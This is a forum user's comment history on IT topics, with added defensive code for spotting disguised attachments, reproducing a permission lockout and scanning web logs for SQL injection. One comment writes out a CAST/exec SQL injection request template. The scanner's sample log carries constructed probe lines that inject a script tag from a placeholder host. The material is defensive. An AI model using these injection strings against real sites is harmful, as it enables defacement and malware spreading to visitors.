81 posts • joined Thursday 8th March 2007 21:44 GMT
Re: To be fair ...
Always nice to read comments and articles from people who've clearly never seen the thing they're writing about!
"The problem is in the helper applications. Adobe's PDF Reader is a particular culprit. There is no way that viewing any kind of document should EVER allow any executable code to run without further explicit confirmation from the user. We are far too lenient about applications that allow remote execution exploits."
Except it's not an actual PDF attachment, it (at least with the variant I've seen in the wild) is an executable, with its icon set to be the standard PDF document icon and a file extension of .pdf.exe, so on machines with the default "hide extension of known file types" option enabled it looks like a pdf file. The example I saw even displayed as having come from another member of staff (a valid address) rather than some government agency.
Surprised there's been no mention in the articles about this of how it also attacks mapped drives, so it's not just the local system at risk. The client that got this had not just that user's machine infected, but also every file that could be accessed via his mapped drives. Fortunately we had backups of the server data, but the client machine's data was less fortunate. Served as a valuable explanation of why we kept telling them to store their data on the server!
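An added example, written for this page and not taken from the commenter or any product mentioned here, of the defender-side check the post above implies: judge an attachment by its last extension (the one Windows actually executes) and show what Explorer displays with the default "hide extensions for known file types" setting, so a name like `invoice.pdf.exe` is flagged even though it is shown as `invoice.pdf`. The extension lists and the sample attachment names are constructed for the example.

```python
import os
from typing import List

# Constructed lists for this example (not exhaustive): extensions Windows runs
# directly, and document/image extensions commonly borrowed as a decoy.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".msi"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
              ".jpg", ".jpeg", ".png", ".txt", ".zip"}


def split_extensions(filename: str) -> List[str]:
    """Every extension in a name, lower-cased, padding spaces stripped.
    The last entry is the real file type: 'Photo .JPG.scr' -> ['.jpg', '.scr']."""
    parts = filename.split(".")
    return ["." + p.strip().lower() for p in parts[1:] if p.strip()]


def displayed_name(filename: str, hide_known_extensions: bool = True) -> str:
    """What Explorer shows with 'hide extensions for known file types' on:
    only the final extension is dropped, so 'invoice.pdf.exe' shows as 'invoice.pdf'."""
    if not hide_known_extensions:
        return filename
    stem, ext = os.path.splitext(filename)
    return stem if ext else filename


def classify_attachment(filename: str) -> dict:
    """Judge an attachment by its *last* extension, which is what Windows executes,
    and flag a decoy document extension in front of it as a masquerade."""
    exts = split_extensions(filename)
    real = exts[-1] if exts else ""
    if real in EXECUTABLE_EXTS:
        decoys = [e for e in exts[:-1] if e in DECOY_EXTS]
        verdict = "masquerade" if decoys else "executable"
    else:
        verdict = "ok"
    return {"name": filename, "real_extension": real,
            "displayed_as": displayed_name(filename), "verdict": verdict}


def scan_attachments(names) -> List[dict]:
    """Entries a mail gateway or attachment filter should hold for review."""
    return [r for r in (classify_attachment(n) for n in names) if r["verdict"] != "ok"]


# Constructed sample attachment names for the demo.
SAMPLE_ATTACHMENTS = ["quarterly-report.pdf", "invoice.pdf.exe",
                      "Photo .JPG.scr", "setup.exe", "notes.txt", "archive.tar.gz"]

if __name__ == "__main__":
    for r in scan_attachments(SAMPLE_ATTACHMENTS):
        print(f"{r['verdict']:<11} {r['name']!r} is shown as {r['displayed_as']!r}")
```

The classification deliberately ignores the icon and the sender, since both are under the attacker's control; the only reliable signal in the name is the final extension, which is exactly the part the default Explorer setting hides.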
Not just Newquay
It's not just Newquay, I believe most places in Exeter don't accept them either any more. Certainly a few years ago when I had some young friends at the Uni they confirmed that some or all pubs wouldn't accept NUS cards or even PASS cards as proof of age, so many of them had to permanently go around with their passport when on a night out.
Does seem a crappy way of going about things but I guess it depends on whether he now goes into discussions with people about granting access. Much easier to start from a position of "I don't have to be here, I'm legally entitled to just deny access, now let's haggle." than one where the others may or may not have rights.
Re: Here we go again...
"It's aimed at RICH grown-ups. I don't know anyone who would spend that kind of money on a mobile and if I did, I'd have to say they were fucking lunatics."
Hardly, I'd say for what it does it's a bargain! Considering my last three phones were an XDA Exec, Nokia E90 and Nokia E7, all of which cost around £600 unlocked, getting this for £475 when it's only just come out is hardly a wrench.
I've had mine for about a week now and absolutely love it. As someone who's always had a full physical keyboard that takes a little getting used to, but the soft keyboard is superb and it's improving as it learns how to write. The way everything fits together seamlessly is great, as is the granularity that you can choose which things alert at what time. Definitely the best phone I've ever owned and the biggest jump in improvements from one phone to another.
Re: Do not trust but don't dismiss either
So agree with you. I've had so many calls over the years from clients with email problems where it turns out the Internet connection is down. But they're users, they don't make that same mental connection.
The other thing I'd add to the list is honesty. Admit when you make mistakes, come clean on screwups, and users are more likely to trust you. Also when something really isn't your fault they're far more likely to believe you.
Completely agree. I'd add to that the sales guys who insist on speaking to you on the phone rather than just replying to an email. I can understand the whole "it's more customer friendly", but if I'm asking for specific information and I've already asked you to email then JUST EMAIL! I know my boss has ditched at least a couple of suppliers who figured it was better to interrupt him than simply email like he'd requested.
The other big thing for me is honesty, not in terms of those mentioned already, but simply the willingness to admit when you've done something wrong, or when you don't know the answer. We all make mistakes, and I'd much rather know about it quickly and re-arrange timescales etc. accordingly, than live in ignorance until a deadline has been missed.
Re: Flawed as usual
"A VM which only runs the latest MS OS and can't emulated H/W is freaking useless..."
Where does it say that's your only choice? If your client machine's running 2012 you can take advantage of the benefits of a generation 2 VM, if not then you continue like before with a normal VM that functions like it always has.
"If I was an enterprise admin, I'd probably want a proper hypervisor OS which is optimised to run and support VMs, without all the unnecessary cruft in a 'server' (glorified client) bloated carp kernel OS."
If you were an enterprise admin you'd probably already know that Hyper-V is a type 1 hypervisor, so it's already running on bare metal without the OS bloat. You can install the standalone Hyper-V Server to avoid having a management OS on the server, or install Server 2012 with Hyper-V, but either way the Hyper-V part is type 1. In the latter case the Windows OS is technically referred to as a management OS rather than a host (since the other guest OSes sit on top of Hyper-V, NOT Windows Server).
Re: Licenses 'sold'.
What would be an interesting figure to find out is how many of those licences have had their downgrade rights enacted, so they're actually used to license a Windows 7 / Windows XP install.
While Win8 is far from perfect I don't think some people's blinkered attitude to change helps, especially when it comes from those of us who should be able to handle it. Having got my head around the new ways of doing things I much prefer Win8, and found for most customers simply spending a little time to familiarise them with the new ways of navigating, shutting down etc. removes most of the concerns they have with it.
Scarily agree with Google!
I can't believe I'm saying this, but I actually agree with Google on this one. If there's a legitimate reason under EU law to have information about you taken down then you should be making that demand on the website, not the search engine. Surely the point is to prevent people from accessing that information about you, in which case simply taking it off Google hasn't done that. If you can't justify taking it down from the website under EU law then how do you justify taking it down from Google?
Once taken down from the website of course it's a different matter, and if Google don't then remove the entry from their listing, and more importantly their cache, then there's obviously a case to answer.
It feels like anyone taking this route is either being lazy, feeling it's easier to make the request from a large organisation like Google rather than a smaller website, or they know the request lacks merit under EU law and would be rejected by the smaller website owner.
Agree with Fred's comment about Google citing their being a US company though. It's a stupid argument, and you have to wonder how many people end up thinking "I agree with your premise, but you've pissed me off with that comment so now I'm against you".
"The most important thing for teaching is good teachers rather than good subject knowledge. A CompSci graduate is complete overkill for teaching computing to lower years."
I disagree, the most important things for a teacher other than the ability to teach are enjoyment and knowledge of the subject. If the teacher doesn't have a passion for what they teach then that will come across to the students and the lessons will be boring. Think of those great teachers you've had that engaged with the class and generated excitement about their subject; they're the ones who encourage students to learn. I can't imagine an arts grad who decides to do this for the extra beer tokens being nearly as good as a computer geek who wants to pass their knowledge on.
A CompSci graduate may well be overkill for many students, but the same could be said for science teachers with degrees in their chosen subject. When a gifted student gets ahead of the class and asks tricky questions attempting to push themselves, that's when that additional knowledge comes in and becomes important.
Re: You count engineer as a scientist?
There are plenty of proper engineers who'd scoff at you calling yourself an engineer. In any other profession it takes more than just going to Uni for 4 years to call yourself an engineer, you have to be properly accredited as well. It's only within IT that we get to blindly call ourselves engineers, and I believe the other professions hate us for it since it devalues the work they do.
IIRC while they might just be doing screwdriver jobs in your house, proper BT engineers have to do a LOT of training to get that title, and are arguably more entitled to use the name than a programmer.
Hell, I've spent 12 years actually working in and with computers, but just coding on them, and I still feel somewhat uncomfortable about being referred to as an IT "Engineer", though most people can at least understand that term compared to something like Sys Admin.
Re: This depends where you are
There's definitely no excuse for not locking out a member of staff when they're fired, hell in the past I've been asked to disable / remove someone's access (but not discuss it with anyone else) while said someone's been in the meeting being fired.
When it comes to notice periods for people in sensitive positions (for instance Sys Admins where they need elevated access just to do their jobs), a common method I've seen is garden leave, where the person is paid as normal during their notice period, is excluded from actually working at the company (since they no longer have access), but is required to be available if required during that time in case they need information / help etc since they are still technically employed during that time.
Re: Trevor Pott
I think he makes many valid points but they're only one side of the issue. I agree that as techies we can be a little too eager to opt for the solution that gives us more toys to play with, and to lose sight of the business side of the equation. Building the best all singing all dancing solution that incorporates every element of failover, expansion and redundancy from a MS whitepaper might sound great, but spending £50k+ on a solution that might save the company £1k per year just isn't worth it. And while we might try to deny it, us techies are just as keen to build our own little empires as any other part of the business.
But on the flip side, guys like this and others in management need to treat IT as a key element in finding the appropriate solution, not simply the implementers of whatever management decide is the best way to go based on little or no actual knowledge. Sometimes management may have the right answer, but if they don't include IT in the decision they'll never know if there might have been a better, cheaper and quicker solution available that they weren't aware of.
In my experience almost all solutions that have come from IT controlling the direction are anything but random, it's where management change their minds, update the spec mid project, and fail to give an overview of the long term direction being taken that the approach becomes random, as IT has to scramble to pry different systems alongside each other.
Too often I think management take the view of "oh, they don't need to know those details", and are then annoyed when the solution presented doesn't meet all the requirements that have existed purely in the manager's own head. If there are specific constraints, objectives and long term plans then we NEED to know about them.
Any task can be broken down into Why, What and How. Why and What are down to management to decide, and they NEED to tell us the What with which we decide on the How. IT don't need to know the Why as long as the What includes those constraints and considerations that will make a difference to How. Management can make suggestions for How, but at the end of the day, that's what we're paid for!
Different tools for different situations
Completely agree with you. I regularly use both methods, with the choice depending purely on which is more suitable and convenient for a given situation. If I want to do the same exact task lots of times then being able to script and automate it is fantastic, but for those simple tasks I do once in a blue moon I'd never remember the specific command, but a GUI is easy to remember.
I loved it with SQL 2005 when they introduced the option to generate the script for what you'd just setup in the GUI. It might not have been the most efficient code, but for something I want to run at night once a week / month I don't care, it's not worth spending hours working out how to script it manually. On the other hand, I hated how MS decided with Exchange 2007 that lots of functions (including some simple day to day ones) should be done exclusively via PowerShell! Why? Allow me to do everything via either interface (allowing for some specific, unusual, high level options you couldn't fit into the GUI) and let me decide which one suits my current task.
GUI wizards may be simplistic at times, but they do make delegation of simple tasks to junior staff much easier. I can show a junior how to run through the wizard and be confident of them not screwing anything up, at the command line I wouldn't feel as secure. But having the command line option means I can use that method when something more complex comes along that the GUI can't handle.
Re: Remote Control
Surprised no one's mentioned PowerShell, which certainly since v2 has included the ability to remotely administer systems!
Re: What A Load Of Girlie Bull-....
@Mad Mike. I definitely agree with the first paragraph! I think part of the issue tends to be that people forget that "IT" is a VERY large subject containing a lot of very different disciplines, each of which tends to lend itself to certain types of people.
I remember reading some research years ago that mentioned how typical personality traits of programmers for instance don't tend to match those of many women, but the more cautious, careful and planned approach required of good DBAs and Sysadmins is a far better match. In fact if you simply look on the Technet forums you'll notice that in the DBA and Sysadmin arenas there are quite a few very skilled and knowledgeable women working in those fields.
The problem in my opinion (and this also applies to getting guys into IT) is that IT education is still very much geared towards the belief that IT = programming. Most courses (school/college/uni) focus on teaching programming languages with some coverage on other areas, so the only people likely to attend them are 1) those who want to be programmers, and 2) those who're into computing enough to put up with a few years of learning things they don't care about to get a piece of paper and get a job in the area they're actually interested in.
If they specifically want more women in IT they need to focus on those disciplines that women actually want to do and have a passion for, show girls that those career paths are available and how to get into them, and stop treating the entire IT world as if it's a single career path.
Re: I don't want to work harder.
Personally I'm very glad I rarely end up doing desktop support these days, since I'm mainly server orientated, but I feel really sorry for the poor buggers who'll have to support this! Effectively we now have two completely different Windows UIs to learn, since some users will be using Metro entirely, while others will be breaking out (well as much as is possible) to the proper Windows desktop, and we'll need to be able to cater for both groups!
I can't help thinking Kevin Turner's never actually MET a real life user. They're going to hate it, it's going to confuse the hell out of them just when they've finally got used to things like the start bar. Geeks might put up with it, learn to use it etc, users won't. They'll moan, complain, and refuse to use it, and that will give IT Support even more of a headache.
At least with 7 they had the geeks on side, liking the new features and willing to pass on the new benefits to their users, with this, not so much. When asked by users why they need the new version, there'll be less "let me show you the features that will make things easier for you", and more "I dunno, I think it's shit as well but we've been told to upgrade you".
I'm really disappointed by 8, which is a shame since with the new virtualisation tech built into it I was really looking forward to it coming out. Now... not so much.
Re: Education does not equate to Knowledge
Part of the problem to my mind is that this seems to be seen as an either/or option. Personally I'd prefer not to see either side making policy without the input of the other side. At the end of the day it's the government's job to set policy, BUT they should always at least consult those in the know before doing so. There's simply no excuse for setting a policy that fails when the relevant people could have predicted it if they'd simply been asked, but there are occasions where other issues might outweigh the science.
For me I think the key would be having greater transparency in the whole process. Ministers should be able to choose which advice they heed and which they ignore, but where they choose to ignore it they should have good overriding reason for doing so, and that reasoning should be documented publicly. If they know that their decision to ignore scientific advice and their reasons behind it are documented and able to be made public, it might help focus their minds to ensure they really do have good reason to decide one way or the other, and aren't simply trying to appease the Daily Mail reading voters.
I agree, I think the biggest issue, and unfortunately it's where the majority of the general public encounter science debate, is on those TV programs which feel a need for a balanced opinion on topics where there is little dissent from the mainstream scientific community. You end up with Prof Jo Bloggs who's worked exclusively in the field for the last 30/40 years having to justify his findings against the views of some random oik they pulled off the street. You end up in a situation where if random oik is better at communicating / hyping up his/her own views then they end up trumping the far more qualified expert, regardless of the validity of their argument. And unfortunately as we're well aware, for many boffins and geeks public speaking in simple language isn't something that comes naturally (major generalisation I know).
If they can't find someone of at least reasonably similar standing in that field to argue against the prof then they should either not bother aiming for balance, or be far more careful how they tread.
don't think that's quite right
Close but no. Time broke because she failed to kill the Teselecta with the Doctor inside, she just didn't know that it wasn’t the Doctor standing in front of her. That was the true fixed point in time, not the actual Doctors death, but obviously no one else knew that. Therefore her kissing the Teselecta at the end restored time to normal. I agree with the rest of it being a bit muddled though. I have to assume Ian Harrison didn't bother actually watching (or paying attention to) the end of the episode.
Yes Hibernation has been around for a long time, but the problem these days is that as powerful computers get more and more memory in them that means more and more data that needs dumping to disk every time. Hibernating an 8GB computer takes quite a long time.
OK, so this isn't revolutionary, but to my mind it is smart evolution. If you can't fix all the problems in one hit, at least fix some of the little things that you can control.
Yeah they changed all that years ago. From memory I believe registrars are no longer allowed to withhold making changes to a domain for any reason. In any case if you do have issues getting a domain transferred to another registrar you can simply go direct to Nominet, pay them £10 (again going from memory) and they'll do it direct without involving the troublesome registrar.
One size doesn't fit all
When I first read this my first thought was that Mozilla were shooting themselves in the foot, but the more I think about it the more I've come to the conclusion that it's not such a big deal. The key is that one size rarely fits all successfully.
In a corporate environment the key requirements are stability and reliability. You want to know that everything will just work, wizzy new features are all well and good, but since the development / testing cycles take so long it's unlikely any internal apps etc will need the latest and greatest features in the short term. An admin wants control over what users are doing and how they do it, and the certainty that things will work as expected, so they don't end up with those on high yelling at them because something hasn’t behaved as expected. I agree with the comments about "apps should be standards compliant and just work", but in the real world that simply can't be relied upon. Telling the MD that staff can't do their work because the developer didn't follow the correct standards and it's not your fault won't wash.
In a home environment on the other hand most people are more tolerant of stability issues (I know I certainly am), but they want to be able to use the latest and greatest apps etc. Facebook games, streaming videos etc are important at home, not in the work place, so rapid deployment of the latest features is important to them. The raft of add-ons available in Firefox can be great for a home user, but again is a pain for an IT admin.
So, while I wonder if Mozilla are being short sighted in ignoring Enterprise environments, if their aim is to target a specific niche (eg home users) then in that respect this is probably the best way to do it, since MS clearly aren't aiming their efforts in that direction.
A little knowledge can be a dangerous thing
Many years ago whilst at Uni I was the main sysadmin for the SU's computing society (TermiSoc for those in the know), which had three linux servers of our very own, stored in the basement of one of the Uni buildings.
There were a few other guys who also had root access, one of whom was very interested in security and spent a lot of time attempting to hack into and then improve our systems.
Now this guy had been reading about the risks of files being owned by root and having execute permission within user accessible folders. He started searching through the filesystem, and discovered that within each user's folder there was a . and .. folder with the permissions he'd been looking out for. Now while the exact details are a little fuzzy (it was at least 12 years ago) I know our ever diligent security geek decided to fix this issue. He proceeded to change the permissions on both folders to prevent executing by normal users.
Shortly afterwards he started hearing people in the lab comment that they could no longer login. Of course removing that permission prevents a user from traversing back through the folder structure, and the login process is unable to traverse to the home directory and /etc directories. The only user able to login was root, but we'd already restricted that so remote connections were only allowed by normal users, who could then su to root, so we had no remote access whatsoever.
Myself and another sysadmin friend, with resident security geek in tow, had to get someone to let us into the basement so we could get console access to the machine and fix the glitch. A fun day, but I think everyone learnt a valuable lesson, and of course the story continues to be recounted occasionally to this day!
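An added reproduction of the lockout in the story above, written for this page rather than taken from the commenter or the society's systems. It builds a throwaway home-directory tree, removes the search (x) bit from a parent directory the way the over-zealous chmod did, and walks the path from / down to the home directory reporting the first component a user can no longer pass through. The check is worked out from the mode bits rather than by attempting access, so it gives the same answer whether or not the script itself happens to run as root (which, as the story notes, is the one account a missing x bit does not stop). The paths and the uid checked are constructed for the demo.

```python
import os
import shutil
import stat
import tempfile
from typing import Optional


def can_traverse(mode: int, dir_uid: int, dir_gid: int, uid: int, gids) -> bool:
    """Search (x) permission for a non-root user, worked out from the mode bits:
    owner class, else group class, else 'other', the way the kernel picks one class."""
    if uid == dir_uid:
        return bool(mode & stat.S_IXUSR)
    if dir_gid in gids:
        return bool(mode & stat.S_IXGRP)
    return bool(mode & stat.S_IXOTH)


def first_blocking_component(path: str, uid: int, gids) -> Optional[str]:
    """Walk from / down to `path` and return the first directory the user cannot
    search; None means every component on the way is reachable. Checking
    root-first matters: stat() on a deeper entry itself needs x on every ancestor."""
    path = os.path.abspath(path)
    chain = []
    while True:
        chain.append(path)
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    for d in reversed(chain):
        st = os.stat(d)
        if stat.S_ISDIR(st.st_mode) and not can_traverse(
                st.st_mode, st.st_uid, st.st_gid, uid, gids):
            return d
    return None


def reproduce_lockout() -> dict:
    """Constructed reproduction: a home tree, the mistaken chmod, then the fix.
    Returns which component (if any) blocked the path at each stage."""
    base = tempfile.mkdtemp(prefix="perm-demo-")
    home = os.path.join(base, "home")
    alice = os.path.join(home, "alice")
    os.makedirs(alice)
    os.chmod(home, 0o755)
    os.chmod(alice, 0o755)
    uid, gids = os.getuid(), set(os.getgroups()) | {os.getgid()}
    try:
        before = first_blocking_component(alice, uid, gids)
        os.chmod(home, 0o644)          # rw but no x: listable, yet untraversable
        during = first_blocking_component(alice, uid, gids)
        os.chmod(home, 0o755)          # restore search permission
        after = first_blocking_component(alice, uid, gids)
        return {"home": home, "before": before, "during": during, "after": after}
    finally:
        os.chmod(home, 0o755)          # make sure rmtree can get back in
        shutil.rmtree(base)


if __name__ == "__main__":
    r = reproduce_lockout()
    print("before chmod  :", r["before"])
    print("after chmod   :", r["during"])
    print("after restore :", r["after"])
```

Run against a real box, `first_blocking_component("/home/alice", uid, gids)` with that user's uid and groups is the quick way to answer "why can't they log in" without having to test each directory by hand, and it is safe to run before anything is changed.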
I think you overestimate normal users
While that might be true for techies, I don't think it is for normal users. As far as they are concerned, they have a computer and it runs Windows. If there is a problem then it's Windows that has crashed, Windows that has lost their work, Windows that is performing slowly. They don't know or care about the rest of it, and most don't even realise that there are differences in quality and performance between seemingly identical components. If a user buys a crappy PC made from really cheap components, they won't blame the computer's hardware when things go wrong, they'll blame Windows, and for that reason I completely understand why MS are going down this path.
Now what they haven't said (at least in this article) is if retail / upgrade copies of Windows 8 will no longer be available. As long as they are then I don't see an issue. Techies wanting to build their own spec computer still can, and will have the knowledge to know that issues could be either hardware or software. Normal users buying branded computers will be assured that the computer they buy is properly built and designed to run that version (rather than it simply being shoehorned on like many previous versions have been on old kit), and it will hopefully then be more stable. Of course it might not work, but either way, whether it's a hardware or software problem a user experiences they will blame Windows by default, so MS have little to lose in trying to reduce the number of hardware issues tainting their reputation.
What about how people ACTUALLY read?
Completely agree, he also seems to miss the fact that many people use PDFs as a way to send an electronic document in a fixed form, eg a quote, invoice, contract etc, so you can be reasonably sure that it hasn't been altered (yes I know there are ways to do it, but most users wouldn't know them). In terms of portrait / landscape I can kind of see where he's coming from, however I think he's missing how people actually read. A column of text is far easier to read and scan through than a wide long line of text; that's why, after all, many documents in A4 portrait have two columns.
Yeah that's what I thought
There may have been more recent updates, but a quick search shows that back in March 2010 the EU demanded that Google delete the unblurred images after 6 months. At the time Google said their policy was to delete them after 12 months. Either way, if this happened (and was photographed) in June 2009, the unblurred pics should have been long gone by November 2010 when this was apparently first raised with Google.
So my guess would be that either a) Google are taking the piss, knowing full well they don't have them any more, or b) if it's possible to recover the data from backups, they want a proper court order (which possibly then allows them to recover the costs), before they make any efforts to recover the image from backup since it's unlikely to be a quick and easy job considering the mass of data they have.
Understanding of Named Instances
"Named instances provide complete database isolation while allowing consolidation onto the same server. But it is a bitch for back-ups. Each instance must be maintained separately from the other instances on that server"
Have you missed the point of named instances entirely? Of course you have to maintain them separately, that's the whole point! Each instance isn't just an isolated session of a single installation of SQL, it's a completely separate installation of SQL. You could have multiple identical instances, or you could have each of them running with a different version, 7, 2000, 2005, 2008, or even different service packs. Server\Instance1 and Server\Instance2 are in no way shape or form connected to one another, other than they both reside on the same server, and as such have to be treated, backed up and patched accordingly.
I'd be concerned about anyone happy to just roll out a patch / service pack to multiple instances at the same time in a production environment, rather than properly installing and testing them individually.
Not sure I follow your logic here. Signing DNS and SSL certificates are two completely different things, and serve completely different purposes.
DNSSEC confirms that the IP address returned when you make a DNS request is the correct one.
SSL confirms that the website you reach is the real one, eg the https://secure.foo.com you see really does belong to Foo Corporation, and not Mr B H Hacker who's set up the site on his server and tricked your computer to go to him instead of the real one. It provides authenticity by ensuring that if you want to purchase an SSL certificate for Foo Ltd, you can prove that you really are Foo Ltd (there's quite a few checks done, especially if you're a Ltd or PLC company, hence their justification for the high prices). And finally, and perhaps most importantly, it allows you and the server you're connecting to to establish a secure tunnel down which all the communications are sent, thus protecting you from anyone sniffing your connection.
What SSL doesn't do is care about what IP address the site is on. As long as you have the certificate information you can install it on any server at any address. So the two don't cross over at all; to my mind they complement each other, improving the overall security for viewing normal websites, and improving yet further the security of secure websites.
Re: Daniel Bennett & Pierre (and a couple of others)
Thanks guys, I was beginning to lose hope of intelligence anywhere in this thread!
Completely agree with the points made about the documents not being editable, however everyone seems to have missed another major reason for not allowing word docs.
When transferring a word document from one machine to another you cannot be certain how it will render. Depending on how the original machine is configured, how the viewing machine is configured, which fonts are loaded on each, the default paper sizes, borders etc, will make a difference to how the document looks on the viewing machine. Assuming at least some of the marks for this work are for presentation, how can the examiner be certain that what they are seeing on their screen is what the student intended to present? If the student creates a document which is well laid out and presented, but it doesn't render properly on the examiner's machine, should that student be marked down for it?
One of the main benefits of PDF (other than the difficulty of altering it) is that it always renders the same on all machines, so you can be certain that if it looks correct on your machine when you create it, it will still look the same when it is marked.
So where is it?
OK, am I missing something here? Where is the actual consultation? The NDS page doesn't show a link, and neither does the DfT page. Of course I'm assuming there is more to it than what's listed on those two pages, and some way to actually submit feedback on-line rather than having to resort to... *shudder* hard copy!
E90 competitor that doesn't compete
I would think the only people who'd want this are those who want an E90 on the cheap! It looks like they've taken the basic form factor, and then removed all the good points from it.
Smaller screen and lower res as already mentioned aside, having the phone only able to open to an angle is going to be annoying for anyone wanting to use it when it is in their hands rather than on a desk, and it seems like they've gone back to the old communicator style! One of the best things with the E90 is being able to use it at an angle on a desk, but also to open it completely when in your hands, which makes it so much easier to see the screen while typing.
This is a phone without a market. At the top end people will pay the extra for the quality of an actual E90, and at the low end, there are better, cheaper and more functional smart phones already out there which do the same things better.
Multiple fixes in one update!
Sorry but WTF! You have a vulnerability which is being actively exploited, so you issue a patch which fixes not only that but four other issues as well!
Why? As a windows admin that would give me serious concern! Taking the DNS patches on their own, I can assess the risk of being attacked against the risk of something breaking, but add in additional patches and you increase the chances of something breaking, which only encourages admins to do more testing, rather than getting a critical fix rolled out asap.
This should have been issued on its own, with perhaps the other updates issued as a separate update... or do Macs not have a decent Windows Updates / WSUS / SMS capability to help manage this properly?
"So just how are the software distribution (well the team they pass it off on to anyway) team actually meant to push patches out to the desktops?
considering S.W.D can't do it between 7am and 7pm due to stupid rules already put in place by them?"
Well any half clueful server admin would already have this kind of thing centralised and automated. Ever heard of WSUS, SUS & BITS? Updates can be downloaded to the PC during working hours without causing disruption (thanks to BITS), and then if the office shuts at 19:00 you can either set all machines to shut down at say 19:30, while telling your Windows Update GPO to install updates and then shut down at 19:00 (so they either shut down as a result of an update, or where none are required it rolls over to the timed shutdown).
Any users complaining that they're "in the middle of something" can simply hibernate their machines at the end of the day before they are forcibly shut down to maintain the previous day's state.
"On the contrary, at least here in England & Wales, barristers are not allowed to knowingly mislead a court"
That's right. A friend of mine who is a barrister explained it to me when I asked him the difference between him and a solicitor when it comes to trials. Essentially, as I understand it, if you're taken to court you get yourself a solicitor and can tell them everything, including that you are guilty. Now I'm not certain about where the split goes, but a lot of the evidence gathering is done by the solicitor, who obviously knows the truth, and this is then passed to your barrister to build a case for your defence, with them always assuming your innocence. This way the solicitor can make sure (while knowing your possible guilt) that they have covered the angles which may come up in the trial against you, without the barrister knowingly lying to the judge/jury.
Wow, it's impressive to see how many people clearly have no idea how or what SQL injection is or how it works!
As anyone who has read up on the methods used recently to do these attacks can confirm, the method used involving cast() means that the web server has no way to know what the data is trying to do. Unless your app checks the data being passed through it, and rejects anything that falls outside of the expected norm, it will simply pass the data to SQL for it to work out.
The basic query format tends to be /foo.asp?bar=1;declare @s varchar(4000);set @s=CAST(0x1234..<loads more hex>..6789 as varchar(4000));exec(@s);--
though obviously with the spaces escaped out with %20s. In the version I've seen a lot of recently, that code, if it manages to get to SQL Server, will get it to run through every single varchar field in the current database, and append an HTML link to a malicious jscript file into each record. That's because the cast statement (which is run by SQL, not the web server) converts the innocent looking string of hex into ASCII, at which point it turns out to be a lovely malicious block of T-SQL code.
For anyone wondering if they are being probed, I'd definitely recommend grepping your web server logs for '=CAST(' without the quotes and seeing what you can find.
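To go with the grep suggestion above, here is an added example (written for this page, not part of the original comment) that does what a plain grep for '=CAST(' cannot: it URL-decodes each request, including double-encoded ones, pulls the hex out of the CAST() and decodes it the way SQL Server would (one byte per character for VARCHAR, UTF-16LE for NVARCHAR), so you can read the T-SQL the probe carries. The log lines, the client addresses and the payload text are all constructed for the example; the hex from the original post is not reproduced.

```python
"""Scan W3C-style web server log lines for CAST(0x...)-based SQL injection probes.

Added example. The sample log and payload below are constructed, not real traffic.
"""
import re
from urllib.parse import unquote_plus

# The CAST(0x<hex> AS [N]VARCHAR(...)) idiom, matched after URL-decoding.
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(N?VARCHAR)\b", re.IGNORECASE)


def normalise_query(raw: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly: double-encoded probes survive a single decode pass."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def decode_cast_payload(hex_digits: str, sql_type: str) -> str:
    """Decode the hex the way SQL Server's CAST does for the declared type."""
    if len(hex_digits) % 2:          # tolerate a truncated trailing nibble
        hex_digits += "0"
    raw = bytes.fromhex(hex_digits)
    if sql_type.upper() == "NVARCHAR":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")     # VARCHAR: one byte per character


def find_cast_injections(query: str) -> list[dict]:
    """Return every decoded CAST() payload found in one query string."""
    q = normalise_query(query)
    return [{"type": t.upper(), "payload": decode_cast_payload(h, t)}
            for h, t in CAST_RE.findall(q)]


def scan_log(log_text: str) -> list[dict]:
    """Parse lines of the form 'date time c-ip cs-method cs-uri-stem cs-uri-query sc-status'."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 7 or parts[0].startswith("#"):
            continue
        _date, _time, client, _method, stem, query, _status = parts[:7]
        for hit in find_cast_injections(query):
            hits.append({"line": lineno, "client": client, "stem": stem, **hit})
    return hits


# Constructed stand-in payload (example.invalid is a reserved, non-resolving domain).
CONSTRUCTED_PAYLOAD = "UPDATE t SET c=c+'<script src=http://example.invalid/x.js></script>'"
HEX_VARCHAR = CONSTRUCTED_PAYLOAD.encode("ascii").hex()
HEX_NVARCHAR = CONSTRUCTED_PAYLOAD.encode("utf-16-le").hex()

# Constructed sample log; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = "\n".join([
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-05-01 10:12:03 192.0.2.10 GET /products.asp id=12 200",
    "2008-05-01 10:12:09 198.51.100.7 GET /foo.asp "
    f"bar=1;declare%20@s%20varchar(4000);set%20@s=cast(0x{HEX_VARCHAR}%20as%20varchar(4000));exec(@s);-- 200",
    # Double-encoded variant: the '=' before CAST is %253D, so a literal grep for '=CAST(' misses it.
    "2008-05-01 10:12:15 198.51.100.7 GET /foo.asp "
    f"bar=1%253Bdeclare%2520@s%2520nvarchar(4000)%253Bset%2520@s%253DCAST(0x{HEX_NVARCHAR}%2520AS%2520NVARCHAR(4000))%253Bexec(@s)%253B-- 200",
])

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} {hit['client']} {hit['stem']} [{hit['type']}]: {hit['payload']}")
```

Run it against your own logs by reading the file into scan_log(); the decoded payload tells you what the probe would have done to the database, which is rather more useful than the raw hex when deciding how worried to be.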
splitting the wealth
All those who have commented that they hope it'll be awarded to EDS seem to have missed:
"The five will then 'compete in a series of mini-competitions to win specific contracts for the various projects.' "
So the entire project is being carved up and in theory all 5 could end up working on it.
Now considering the previous record with this kind of thing, does anyone REALLY believe it'll be a genuine contest? Maybe I'm paranoid but I have visions of someone from each of the five companies meeting for a coffee to decide how to split it up between them, therefore minimising the amount of profit they'd need to shave off the quote to get the work... but of course that could never happen now could it!
